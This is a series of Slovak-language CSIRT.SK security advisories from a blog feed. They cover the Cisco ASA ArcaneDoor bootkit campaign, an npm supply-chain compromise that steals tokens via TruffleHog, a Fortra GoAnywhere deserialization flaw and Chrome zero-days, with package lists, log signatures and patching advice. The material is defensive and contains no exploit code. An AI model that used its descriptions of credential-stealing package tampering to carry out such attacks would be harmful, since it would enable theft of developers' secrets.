<p><strong>Zraniteľnosti CVE-2025-20333 a </strong><strong>CVE-2025-20362 v&nbsp;súčasnosti aktívne zneužívajú útočníci, ktorí v&nbsp;apríli 2024 stáli aj za kampaňou </strong><a href="https://www.cisa.gov/news-events/alerts/2024/04/24/cisco-releases-security-updates-addressing-arcanedoor-vulnerabilities-cisco-firewall-platforms"><strong>ArcaneDoor</strong></a><strong>. Pre túto kampaň CSIRT.SK vydal 29. apríla 2024 </strong><a href="https://csirt.sk/posts/854"><strong>varovanie</strong></a><strong>. ArcaneDoor zraniteľnosti zneužíva na vzdialené vykonanie kódu a manipuláciu pamäte ROM na zachovanie perzistencie po reštartoch alebo upgradov zariadení.</strong></p>



<p>Americká <a href="https://www.cisa.gov/news-events/directives/ed-25-03-identify-and-mitigate-potential-compromise-cisco-devices">CISA</a> zraniteľnosti zároveň pridala do katalógu aktívne zneužívaných zraniteľností KEV (Known Exploited Vulnerabilities). <a href="https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/RayInitiator-LINE-VIPER/ncsc-mar-rayinitiator-line-viper.pdf">NCSC-UK</a> v súvislosti so zneužitím zraniteľností identifikovalo dva nové malwary RAYINITIATOR a LINE VIPER<strong>. RayInitiator je perzistentný GRUB</strong> (GRand Unified Bootloader) <strong>bootkit</strong>, ktorý sa flashuje do pamäte ROM a je schopný prežiť reštarty zariadenia a upgrady firmvéru. Jeho primárnou úlohou je priamo do operačnej pamäte zariadenia načítať <strong>LINE VIPER</strong>, ktorý dokáže spúšťať CLI príkazy, zachytávať pakety, obchádzať VPN AAA, potlačiť správy syslog, zachytávať CLI príkazy a za účelom prevencie diagnostiky spôsobuje úmyselné reštarty zariadenia.</p>



<p>Možnú existenciu zero-day zraniteľností indikovalo aj zvýšené skenovanie za účelom identifikácie Cisco ASA portov a Cisco IOS Telnet/SSH služieb, ktoré koncom augusta 2025 zachytila spoločnosť <a href="https://www.greynoise.io/blog/scanning-surge-cisco-asa-devices">Greynoise</a>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie mechanizmov autentifikácie</strong></li>



<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Administrátorom odporúčame postupovať podľa </strong><a href="https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_continued_attacks"><strong>návodu výrobcu</strong></a><strong>, ktorý bol vydaný špecificky za účelom riešenia tejto kampane.</strong> Cisco taktiež odporúča aktivovať funkciu Threat Detection for VPN Services, ktorú možno zapnúť podľa <a href="https://www.cisco.com/c/en/us/td/docs/security/asa/asa920/configuration/firewall/asa-920-firewall-config/conns-threat.html#configure-threat-detection-for-vpn-services">návodu</a>.</p>



<p>Infekciu zariadení možno identifikovať aj vyhľadávaním anomálií v&nbsp;logoch:</p>



<ul>
<li>zamerajte sa najmä na zníženie počtu prípadne úplne chýbajúce záznamy o&nbsp;udalostiach SYSLOG</li>
</ul>



<p>302013 (&#8220;informational&#8221; level)<br>302014 (&#8220;informational&#8221; level)<br>609002 (&#8220;debug&#8221; level)<br>710005 (&#8220;debug&#8221; level)</p>



<ul>
<li>deaktivovaná funkcia checkheaps. Predvolene sa checkheaps spustí raz za 60 sekúnd. Vydanie príkazu show checkheaps vygeneruje výstup podobný nižšie uvedenému vzorovému výstupu. Odporúčame tento príkaz vykonávať raz za minútu počas piatich minút. Pokiaľ nepozorujete zmenu v zobrazovanom počte spustení, môže to indikovať kompromitáciu.</li>
</ul>



<p>firewall# show checkheaps <br>Checkheaps stats from buffer validation runs <br>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br>Time elapsed since last run      : 28 secs<br>Duration of last run             : 0 millisecs<br>Number of buffers created        : 106<br>Number of buffers allocated      : 103<br>Number of buffers free           : 3<br>Total memory in use              : 110620 bytes<br>Total memory in free buffers     : 124 bytes<br>Total number of runs             : 6352        </p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_continued_attacks">https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_continued_attacks</a></li>



<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-z5xP8EUB">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-z5xP8EUB</a></li>



<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-YROOTUW">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-YROOTUW</a></li>



<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-http-code-exec-WmfP3h3O">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-http-code-exec-WmfP3h3O</a></li>



<li><a href="https://www.cisa.gov/news-events/directives/ed-25-03-identify-and-mitigate-potential-compromise-cisco-devices">https://www.cisa.gov/news-events/directives/ed-25-03-identify-and-mitigate-potential-compromise-cisco-devices</a></li>



<li><a href="https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/RayInitiator-LINE-VIPER/ncsc-mar-rayinitiator-line-viper.pdf">https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/RayInitiator-LINE-VIPER/ncsc-mar-rayinitiator-line-viper.pdf</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2818/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kompromitované balíčky v knižnici NPM šíria malvér</title>
		<link>/posts/2811</link>
					<comments>/posts/2811#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 29 Sep 2025 09:09:58 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[NPM]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2811</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/07/npm-1024x655.png" alt="" /></p>Bezpečnostní výskumníci odhalili nový útok na dodávateľský reťazec v npm registri, ktorý zasiahol stovky balíčkov od rôznych udržiavateľov. Tieto balíčky...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/07/npm-1024x655.png" alt="" /></p>
<p><strong>Bezpečnostní výskumníci odhalili nový útok na dodávateľský reťazec v npm registri, ktorý zasiahol stovky balíčkov od rôznych udržiavateľov. Tieto balíčky sa používajú ako súčasti softvéru a webových stránok, od komerčných aplikácií až po open-source projekty, čo znamená, že počet ohrozených produktov nie je možné presne určiť.</strong></p>



<p><strong>Infikované balíčky:</strong><strong></strong></p>



<ul>
<li>@ahmedhfarag/ngx-perfect-scrollbar 20.0.20</li>



<li>@ahmedhfarag/ngx-virtual-scroller 4.0.4</li>



<li>@art-ws/common 2.0.22, 2.0.28</li>



<li>@art-ws/config-eslint 2.0.4, 2.0.5</li>



<li>@art-ws/config-ts 2.0.7, 2.0.8</li>



<li>@art-ws/db-context 2.0.24</li>



<li>@art-ws/di 2.0.28, 2.0.32</li>



<li>@art-ws/di-node 2.0.13</li>



<li>@art-ws/eslint 1.0.5, 1.0.6</li>



<li>@art-ws/fastify-http-server 2.0.24, 2.0.27</li>



<li>@art-ws/http-server 2.0.21, 2.0.25</li>



<li>@art-ws/openapi 0.1.9, 0.1.12</li>



<li>@art-ws/package-base 1.0.5, 1.0.6</li>



<li>@art-ws/prettier 1.0.5, 1.0.6</li>



<li>@art-ws/slf 2.0.15, 2.0.22</li>



<li>@art-ws/ssl-info 1.0.9, 1.0.10</li>



<li>@art-ws/web-app 1.0.3, 1.0.4</li>



<li>@crowdstrike/commitlint 8.1.1, 8.1.2</li>



<li>@crowdstrike/falcon-shoelace 0.4.1, 0.4.2</li>



<li>@crowdstrike/foundry-js 0.19.1, 0.19.2</li>



<li>@crowdstrike/glide-core 0.34.2, 0.34.3</li>



<li>@crowdstrike/logscale-dashboard 1.205.1, 1.205.2</li>



<li>@crowdstrike/logscale-file-editor 1.205.1, 1.205.2</li>



<li>@crowdstrike/logscale-parser-edit 1.205.1, 1.205.2</li>



<li>@crowdstrike/logscale-search 1.205.1, 1.205.2</li>



<li>@crowdstrike/tailwind-toucan-base 5.0.1, 5.0.2</li>



<li>@ctrl/deluge 7.2.1, 7.2.2</li>



<li>@ctrl/golang-template 1.4.2, 1.4.3</li>



<li>@ctrl/magnet-link 4.0.3, 4.0.4</li>



<li>@ctrl/ngx-codemirror 7.0.1, 7.0.2</li>



<li>@ctrl/ngx-csv 6.0.1, 6.0.2</li>



<li>@ctrl/ngx-emoji-mart 9.2.1, 9.2.2</li>



<li>@ctrl/ngx-rightclick 4.0.1, 4.0.2</li>



<li>@ctrl/qbittorrent 9.7.1, 9.7.2</li>



<li>@ctrl/react-adsense 2.0.1, 2.0.2</li>



<li>@ctrl/shared-torrent 6.3.1, 6.3.2</li>



<li>@ctrl/tinycolor 4.1.1, 4.1.2</li>



<li>@ctrl/torrent-file 4.1.1, 4.1.2</li>



<li>@ctrl/transmission 7.3.1</li>



<li>@ctrl/ts-base32 4.0.1, 4.0.2</li>



<li>@hestjs/core 0.2.1</li>



<li>@hestjs/cqrs 0.1.6</li>



<li>@hestjs/demo 0.1.2</li>



<li>@hestjs/eslint-config 0.1.2</li>



<li>@hestjs/logger 0.1.6</li>



<li>@hestjs/scalar 0.1.7</li>



<li>@hestjs/validation 0.1.6</li>



<li>@nativescript-community/arraybuffers 1.1.6, 1.1.7, 1.1.8</li>



<li>@nativescript-community/gesturehandler 2.0.35</li>



<li>@nativescript-community/perms 3.0.5, 3.0.6, 3.0.7, 3.0.8</li>



<li>@nativescript-community/sentry 4.6.43</li>



<li>@nativescript-community/sqlite 3.5.2, 3.5.3, 3.5.4, 3.5.5</li>



<li>@nativescript-community/text 1.6.9, 1.6.10, 1.6.11, 1.6.12, 1.6.13</li>



<li>@nativescript-community/typeorm 0.2.30, 0.2.31, 0.2.32, 0.2.33</li>



<li>@nativescript-community/ui-collectionview 6.0.6</li>



<li>@nativescript-community/ui-document-picker 1.1.27, 1.1.28</li>



<li>@nativescript-community/ui-drawer 0.1.30</li>



<li>@nativescript-community/ui-image 4.5.6</li>



<li>@nativescript-community/ui-label 1.3.35, 1.3.36, 1.3.37</li>



<li>@nativescript-community/ui-material-bottom-navigation 7.2.72, 7.2.73, 7.2.74, 7.2.75</li>



<li>@nativescript-community/ui-material-bottomsheet 7.2.72</li>



<li>@nativescript-community/ui-material-core 7.2.72, 7.2.73, 7.2.74, 7.2.75, 7.2.76</li>



<li>@nativescript-community/ui-material-core-tabs 7.2.72, 7.2.73, 7.2.74, 7.2.75, 7.2.76</li>



<li>@nativescript-community/ui-material-ripple 7.2.72, 7.2.73, 7.2.74, 7.2.75</li>



<li>@nativescript-community/ui-material-tabs 7.2.72, 7.2.73, 7.2.74, 7.2.75</li>



<li>@nativescript-community/ui-pager 14.1.36, 14.1.37, 14.1.38</li>



<li>@nativescript-community/ui-pulltorefresh 2.5.4, 2.5.5, 2.5.6, 2.5.7</li>



<li>@nexe/config-manager 0.1.1</li>



<li>@nexe/eslint-config 0.1.1</li>



<li>@nexe/logger 0.1.3</li>



<li>@nstudio/angular 20.0.4, 20.0.5, 20.0.6</li>



<li>@nstudio/focus 20.0.4, 20.0.5, 20.0.6</li>



<li>@nstudio/nativescript-checkbox 2.0.6, 2.0.7, 2.0.8, 2.0.9</li>



<li>@nstudio/nativescript-loading-indicator 5.0.1, 5.0.2, 5.0.3, 5.0.4</li>



<li>@nstudio/ui-collectionview 5.1.11, 5.1.12, 5.1.13, 5.1.14</li>



<li>@nstudio/web 20.0.4</li>



<li>@nstudio/web-angular 20.0.4</li>



<li>@nstudio/xplat 20.0.5, 20.0.6, 20.0.7</li>



<li>@nstudio/xplat-utils 20.0.5, 20.0.6, 20.0.7</li>



<li>@operato/board 9.0.36, 9.0.37, 9.0.38, 9.0.39, 9.0.40, 9.0.41, 9.0.42, 9.0.43, 9.0.44, 9.0.45, 9.0.46, 9.0.47, 9.0.48, 9.0.49, 9.0.50, 9.0.51</li>



<li>@operato/data-grist 9.0.29, 9.0.35, 9.0.36, 9.0.37</li>



<li>@operato/graphql 9.0.22, 9.0.35, 9.0.36, 9.0.37, 9.0.38, 9.0.39, 9.0.40, 9.0.41, 9.0.42, 9.0.43, 9.0.44, 9.0.45, 9.0.46</li>



<li>@operato/headroom 9.0.2, 9.0.35, 9.0.36, 9.0.37</li>



<li>@operato/help 9.0.35, 9.0.36, 9.0.37, 9.0.38, 9.0.39, 9.0.40, 9.0.41, 9.0.42, 9.0.43, 9.0.44, 9.0.45, 9.0.46</li>



<li>@operato/i18n 9.0.35, 9.0.36, 9.0.37</li>



<li>@operato/input 9.0.27, 9.0.35, 9.0.36, 9.0.37, 9.0.38, 9.0.39, 9.0.40, 9.0.41, 9.0.42, 9.0.43, 9.0.44, 9.0.45, 9.0.46, 9.0.47, 9.0.48</li>



<li>@operato/layout 9.0.35, 9.0.36, 9.0.37</li>



<li>@operato/popup 9.0.22, 9.0.35, 9.0.36, 9.0.37, 9.0.38, 9.0.39, 9.0.40, 9.0.41, 9.0.42, 9.0.43, 9.0.44, 9.0.45, 9.0.46, 9.0.49</li>



<li>@operato/pull-to-refresh 9.0.36, 9.0.37, 9.0.38, 9.0.39, 9.0.40, 9.0.41, 9.0.42</li>



<li>@operato/shell 9.0.22, 9.0.35, 9.0.36, 9.0.37, 9.0.38, 9.0.39</li>



<li>@operato/styles 9.0.2, 9.0.35, 9.0.36, 9.0.37</li>



<li>@operato/utils 9.0.22, 9.0.35, 9.0.36, 9.0.37, 9.0.38, 9.0.39, 9.0.40, 9.0.41, 9.0.42, 9.0.43, 9.0.44, 9.0.45, 9.0.46, 9.0.49</li>



<li>@teselagen/bio-parsers 0.4.30</li>



<li>@teselagen/bounce-loader 0.3.16, 0.3.17</li>



<li>@teselagen/file-utils 0.3.22</li>



<li>@teselagen/liquibase-tools 0.4.1</li>



<li>@teselagen/ove 0.7.40</li>



<li>@teselagen/range-utils 0.3.14, 0.3.15</li>



<li>@teselagen/react-list 0.8.19, 0.8.20</li>



<li>@teselagen/react-table 6.10.19, 6.10.20, 6.10.22</li>



<li>@teselagen/sequence-utils 0.3.34</li>



<li>@teselagen/ui 0.9.10</li>



<li>@thangved/callback-window 1.1.4</li>



<li>@things-factory/attachment-base 9.0.43, 9.0.44, 9.0.45, 9.0.46, 9.0.47, 9.0.48, 9.0.49, 9.0.50</li>



<li>@things-factory/auth-base 9.0.43, 9.0.44, 9.0.45</li>



<li>@things-factory/email-base 9.0.42, 9.0.43, 9.0.44, 9.0.45, 9.0.46, 9.0.47, 9.0.48, 9.0.49, 9.0.50, 9.0.51, 9.0.52, 9.0.53, 9.0.54</li>



<li>@things-factory/env 9.0.42, 9.0.43, 9.0.44, 9.0.45</li>



<li>@things-factory/integration-base 9.0.43, 9.0.44, 9.0.45</li>



<li>@things-factory/integration-marketplace 9.0.43, 9.0.44, 9.0.45</li>



<li>@things-factory/shell 9.0.43, 9.0.44, 9.0.45</li>



<li>@tnf-dev/api 1.0.8</li>



<li>@tnf-dev/core 1.0.8</li>



<li>@tnf-dev/js 1.0.8</li>



<li>@tnf-dev/mui 1.0.8</li>



<li>@tnf-dev/react 1.0.8</li>



<li>@ui-ux-gang/devextreme-angular-rpk 24.1.7</li>



<li>@yoobic/design-system 6.5.17</li>



<li>@yoobic/jpeg-camera-es6 1.0.13</li>



<li>@yoobic/yobi 8.7.53</li>



<li>airchief 0.3.1</li>



<li>airpilot 0.8.8</li>



<li>angulartics2 14.1.1, 14.1.2</li>



<li>browser-webdriver-downloader 3.0.8</li>



<li>capacitor-notificationhandler 0.0.2, 0.0.3</li>



<li>capacitor-plugin-healthapp 0.0.2, 0.0.3</li>



<li>capacitor-plugin-ihealth 1.1.8, 1.1.9</li>



<li>capacitor-plugin-vonage 1.0.2, 1.0.3</li>



<li>capacitorandroidpermissions 0.0.4, 0.0.5</li>



<li>config-cordova 0.8.5</li>



<li>cordova-plugin-voxeet2 1.0.24</li>



<li>cordova-voxeet&nbsp; 1.0.32</li>



<li>create-hest-app 0.1.9</li>



<li>db-evo 1.1.4, 1.1.5</li>



<li>devextreme-angular-rpk 21.2.8</li>



<li>ember-browser-services 5.0.2, 5.0.3</li>



<li>ember-headless-form 1.1.2, 1.1.3</li>



<li>ember-headless-form-yup 1.0.1</li>



<li>ember-headless-table 2.1.5, 2.1.6</li>



<li>ember-url-hash-polyfill 1.0.12, 1.0.13</li>



<li>ember-velcro 2.2.1, 2.2.2</li>



<li>encounter-playground 0.0.2, 0.0.3, 0.0.4, 0.0.5</li>



<li>eslint-config-crowdstrike 11.0.2, 11.0.3</li>



<li>eslint-config-crowdstrike-node 4.0.3, 4.0.4</li>



<li>eslint-config-teselagen 6.1.7, 6.1.8</li>



<li>globalize-rpk 1.7.4</li>



<li>graphql-sequelize-teselagen 5.3.8, 5.3.9</li>



<li>html-to-base64-image 1.0.2</li>



<li>json-rules-engine-simplified 0.2.1, 0.2.4</li>



<li>jumpgate 0.0.2</li>



<li>koa2-swagger-ui 5.11.1, 5.11.2</li>



<li>mcfly-semantic-release 1.3.1</li>



<li>mcp-knowledge-base 0.0.2</li>



<li>mcp-knowledge-graph 1.2.1</li>



<li>mobioffice-cli 1.0.3</li>



<li>monorepo-next 13.0.1, 13.0.2</li>



<li>mstate-angular 0.4.4</li>



<li>mstate-cli 0.4.7</li>



<li>mstate-dev-react 1.1.1</li>



<li>mstate-react 1.6.5</li>



<li>ng2-file-upload 7.0.2, 7.0.3, 8.0.1, 8.0.2, 8.0.3, 9.0.1</li>



<li>ngx-bootstrap 18.1.4, 19.0.3, 19.0.4, 20.0.3, 20.0.4, 20.0.5</li>



<li>ngx-color 10.0.1, 10.0.2</li>



<li>ngx-toastr 19.0.1, 19.0.2</li>



<li>ngx-trend 8.0.1</li>



<li>ngx-ws 1.1.5, 1.1.6</li>



<li>oradm-to-gql 35.0.14, 35.0.15</li>



<li>oradm-to-sqlz 1.1.2, 1.1.5</li>



<li>ove-auto-annotate 0.0.9, 0.0.10</li>



<li>pm2-gelf-json 1.0.4, 1.0.5</li>



<li>printjs-rpk 1.6.1</li>



<li>react-complaint-image 0.0.32, 0.0.35</li>



<li>react-jsonschema-form-conditionals 0.3.18, 0.3.21</li>



<li>react-jsonschema-form-extras 1.0.4</li>



<li>react-jsonschema-rxnt-extras 0.4.9</li>



<li>remark-preset-lint-crowdstrike 4.0.1, 4.0.2</li>



<li>rxnt-authentication 0.0.3, 0.0.4, 0.0.5, 0.0.6</li>



<li>rxnt-healthchecks-nestjs 1.0.2, 1.0.3, 1.0.4, 1.0.5</li>



<li>rxnt-kue 1.0.4, 1.0.5, 1.0.6, 1.0.7</li>



<li>swc-plugin-component-annotate 1.9.1, 1.9.2</li>



<li>tbssnch 1.0.2</li>



<li>teselagen-interval-tree 1.1.2</li>



<li>tg-client-query-builder 2.14.4, 2.14.5</li>



<li>tg-redbird 1.3.1, 1.3.2</li>



<li>tg-seq-gen 1.0.9, 1.0.10</li>



<li>thangved-react-grid 1.0.3</li>



<li>ts-gaussian 3.0.5, 3.0.6</li>



<li>ts-imports 1.0.1, 1.0.2</li>



<li>tvi-cli 0.1.5</li>



<li>ve-bamreader 0.2.6, 0.2.7</li>



<li>ve-editor 1.0.1, 1.0.2</li>



<li>verror-extra 6.0.1</li>



<li>voip-callkit 1.0.2, 1.0.3</li>



<li>wdio-web-reporter 0.1.3</li>



<li>yargs-help-output 5.0.3</li>



<li>yoo-styles 6.0.326</li>
</ul>



<p><strong>Pozn.: tento zoznam nie je kompletný.</strong></p>



<p><strong>Opis útoku:</strong><strong></strong></p>



<p>Útočníci využili funkciu NpmModule.updatePackage, ktorá sťahuje balíček, upravuje jeho package.json, vkladá škodlivý skript bundle.js, znovu zabaľuje archív a opätovne ho zverejňuje, čím automaticky infikuje závislé balíčky. Cieľom útoku je zneužiť nástroj TruffleHog na vyhľadávanie citlivých údajov, ako sú prístupové tokeny pre GitHub a&nbsp;cloudové služby, a odoslať ich na server pod kontrolou útočníka. Útok cielený na systémy Windows aj Linux môže zneužívať aj CI/CD pipeline cez GitHub Actions, čím umožňuje trvalú exfiltráciu údajov.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie príkazov</strong></li>



<li><strong>Únik citlivých informácií</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong><strong></strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a vývojárom sa odporúča skontrolovať svoje prostredie a v prípade zistenia infikovaných balíčkov po ich odstránení zmeniť prístupové údaje a obnoviť npm tokeny. Zároveň je dôležité vyčistiť npm cache a používať súbor package-lock.json a pinované verzie balíčkov, ako aj informovať subdodávateľov o incidente.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://socket.dev/blog/tinycolor-supply-chain-attack-affects-40-packages">https://socket.dev/blog/tinycolor-supply-chain-attack-affects-40-packages</a></li>



<li><a href="https://www.stepsecurity.io/blog/ctrl-tinycolor-and-40-npm-packages-compromised">https://www.stepsecurity.io/blog/ctrl-tinycolor-and-40-npm-packages-compromised</a></li>



<li><a href="https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised">https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2811/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v platforme pre prenos súborov Fortra GoAnyWhere MFT</title>
		<link>/posts/2808</link>
					<comments>/posts/2808#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 29 Sep 2025 09:05:36 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Fortra]]></category>
		<category><![CDATA[GoAnyWhere]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2808</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/08/fortra_esbd-469x352-1.jpg" alt="" /></p>Spoločnosť Fortra vydala bezpečnostné aktualizácie webového nástroja pre prenos súborov GoAnywhere MFT (Managed File Transfer), ktoré opravujú kritickú zraniteľnosť. CVE-2025-10035...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/08/fortra_esbd-469x352-1.jpg" alt="" /></p>
<p><strong>Spoločnosť Fortra vydala bezpečnostné aktualizácie webového nástroja pre prenos súborov GoAnywhere MFT (Managed File Transfer), ktoré opravujú kritickú zraniteľnosť. CVE-2025-10035 by vzdialený neautentifikovaný útočník mohol zneužiť na injekciu príkazov a získanie úplnej kontroly nad systémom. Zraniteľnosť je aktívne zneužívaná.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Fortra GoAnywhere MFT 7.8.X vo verziách starších ako 7.8.4</li>



<li>Fortra GoAnywhere MFT 7.6.X vo verziách starších ako Sustain Release 7.6.3</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-10035­­ </strong>(CVSSv3.1 skóre 10,0)</p>



<p>Kritická zraniteľnosť sa nachádza v <strong>komponente License Servlet</strong> a&nbsp;súvisí s deserializáciou nedôveryhodných dát. Vzdialený útočník by ju podvrhnutím špeciálne vytvorenej odpovede s platným podpisom Licence Response mohol zneužiť na <strong>injekciu príkazov </strong>a <strong>získanie úplnej kontroly nad systémom</strong>.</p>



<p><strong>Pozn.: Zraniteľné sú všetky inštancie produktu, ktoré majú administratívnu konzolu voľne prístupnú z internetu.</strong> <strong>Zraniteľnosť je aktívne zneužívaná minimálne od 10. septembra 2025.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonanie ľubovoľných príkazov</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú aktualizáciu na Fortra GoAnywhere MFT na verziu 7.8.4 alebo Sustain Release 7.6.3. Výrobca rovnako odporúča limitovať prístup k&nbsp;administratívnemu rozhraniu produktu zavedením firewallových pravidiel alebo VPN prístupu.</p>



<p>Zneužitie zraniteľnosti môžete identifikovať analýzou Admin Audit logov a&nbsp;logov aplikácie. Zamerajte sa na chybové hlášky obsahujúce reťazec „SignedObject.getObject“. Prítomnosť výnimiek (eng. Exception) v&nbsp;nasledujúcom tvare indikuje prítomnosť pokusu o&nbsp;zneužitie zraniteľnosti:</p>



<figure class="wp-block-table"><table><tbody><tr><td>ERROR Error parsing license response <br>java.lang.RuntimeException: InvocationTargetException: <br>java.lang.reflect.InvocationTargetException <br>&#8230; <br>at java.base/java.io.ObjectInputStream.readObject(Unknown Source) <br>at java.base/java.security.SignedObject.getObject(Unknown Source)</td></tr></tbody></table></figure>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.fortra.com/security/advisories/product-security/fi-2025-012">https://www.fortra.com/security/advisories/product-security/fi-2025-012</a></li>



<li><a href="https://www.cve.org/cverecord?id=CVE-2025-10035">https://www.cve.org/cverecord?id=CVE-2025-10035</a></li>



<li><a href="https://thehackernews.com/2025/09/fortra-releases-critical-patch-for-cvss.html">https://thehackernews.com/2025/09/fortra-releases-critical-patch-for-cvss.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2808/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Google opravil aktívne zneužívanú zero-day zraniteľnosť v prehliadači Chrome</title>
		<link>/posts/2806</link>
					<comments>/posts/2806#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 29 Sep 2025 09:02:56 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Chrome]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2806</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>Spoločnosť Google vydala bezpečnostné aktualizácie pre svoj webový prehliadač Chrome, ktoré opravujú 4 vysoko závažné zraniteľnosti, z čoho 1 je označená...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>
<p><strong>Spoločnosť Google vydala bezpečnostné aktualizácie pre svoj webový prehliadač Chrome, ktoré opravujú 4 vysoko závažné zraniteľnosti, z čoho 1 je označená ako aktívne zneužívaná zero-day. CVE-2025-10585 by vzdialený neautentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Chrome pre Windows a&nbsp;Mac vo verziách starších ako 140.0.7339.185/.186</li>



<li>Chrome pre Linux vo verziách starších ako 140.0.7339.185</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-10585 </strong>(CVSSv3 skóre 8,8)</p>



<p>Zraniteľnosť vysokej závažnosti sa nachádza v&nbsp;komponente <strong>V8</strong> a&nbsp;vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvoreného webového obsahu mohol zneužiť&nbsp;na <strong>vzdialené vykonanie kódu</strong>. CVE-2025-10585 spočíva v&nbsp;nesprávnom vyhodnocovaní dátových typov.<strong> Zraniteľnosť je podľa spoločnosti Google aktívne zneužívaná. </strong>Tento rok sa jedná už o šiestu zero-day zraniteľnosť Chrome, ktorá bola označená za aktívne zneužívanú.</p>



<p><strong>CVE-2025-10500, CVE-2025-10501, CVE-2025-10502 </strong>(CVSSv3 skóre 8,8)</p>



<p>Zraniteľnosti v&nbsp;komponentoch <strong>Dawn, WebRTC</strong> a&nbsp;<strong>ANGLE </strong>spočívajú v&nbsp;možnosti použitia odalokovaného miesta v&nbsp;pamäti (CVE-2025-10500, CVE-2025-10501) a&nbsp;pretečení medzipamäte haldy (CVE-2025-10502). Vzdialený neautentifikovaný útočník by ich podvrhnutím špeciálne vytvoreného webového obsahu mohol zneužiť na <strong>vzdialené vykonanie kódu</strong> alebo <strong>zneprístupnenie služby</strong>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Zneprístupnenie služby</strong> <strong>(DoS)</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom odporúčame bezodkladnú aktualizáciu prehliadača Chrome na najnovšie verzie 140.0.7339.185/.186 (Windows, Mac) a 140.0.7339.185 (Linux).</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://chromereleases.googleblog.com/2025/09/stable-channel-update-for-desktop_17.html">https://chromereleases.googleblog.com/2025/09/stable-channel-update-for-desktop_17.html</a></li>



<li><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/Y2DBXZkBmtYcrSEbVUzc">https://exchange.xforce.ibmcloud.com/vulnerabilities/Y2DBXZkBmtYcrSEbVUzc</a></li>



